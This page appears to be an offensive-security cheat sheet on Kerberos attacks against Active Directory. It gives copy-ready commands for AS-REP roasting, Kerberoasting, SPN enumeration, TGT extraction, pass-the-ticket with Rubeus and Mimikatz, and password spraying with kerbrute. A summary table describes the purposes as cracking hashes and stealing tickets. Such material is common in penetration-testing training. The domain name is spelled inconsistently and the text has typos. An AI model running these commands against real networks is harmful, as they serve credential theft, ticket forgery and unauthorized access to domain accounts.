Kerberos Enumeration

1. AS-REP Roasting (No Pre-auth)

Target accounts with "Do not require Kerberos preauthentication" enabled

Tools : GetNPUsers.py, Rubeus

impacket-GetNPUsers infosec.local/ -userfile users.txt -dc-ip <IP> -no-pass
Rubeus.exe asreproast

2. Kerberoasting

Request TGS tickets for SPNs to crack offline

Tools : GetUserSPNs.py, Rubeus

impacket-GetUserSPNs infosec.local/<username>:<password> -dc-ip <IP> -request
Rubeus.exe kerberoast /user:targetuser /domain:infosecwarrior.local /dc:<IP>

3. SPN Enumeration

List Service Pricipal Names to identify service accounts

Tools: setspn, PowerView

setspn -T infosecwarrior.local -Q */*
Import-Module .\PowerView.ps1
Get-DomainUser -SPN *

4. TGT Extraction

Extract Ticket Granting Tickets (TGT) for later reuse

Tools : Rubeus

Rubeus.exe tgtdeleg

5. Pass-the-Ticket (PTT)

Inject Kerberos tickets into current session

Tools : Runeus, Mimikatz

Rubeus.exe ptt /ticket:<base64_ticket>
mimikatz # kerberos::ptt ticket.kirbi

6. Password Spraying via Kerberos

Enumerate users and spray passwords over Kerberos

Tool: Kerbrute

kerbrute userenum --dc <IP> -d infosecwarriour.local users.txt
kerbrute passwordspray -d imfosecwarrior.local --dc <IP> users.txt password123

Summary Table

Technique

Purpose

Tools

ASREP Roasting

Crack user hash w/o pre-auth

GetNPUsers, Rubeus

Kerberoasting

Crack SPN account hash

GetUserSPNs, Rubeus

SPN Enumeration

Identify service accounts

setspn, PowerView

TGT Extraction

Steal valid kerberos TGT

Rubeus

Pass-The-Ticket

Authenticat using ticket

Rubeus, MimiKatz

Password Spray

Brute-force credentials over KDC

kerbrute

PreviousPowerHuntSharesNextKerberos Attack

Last updated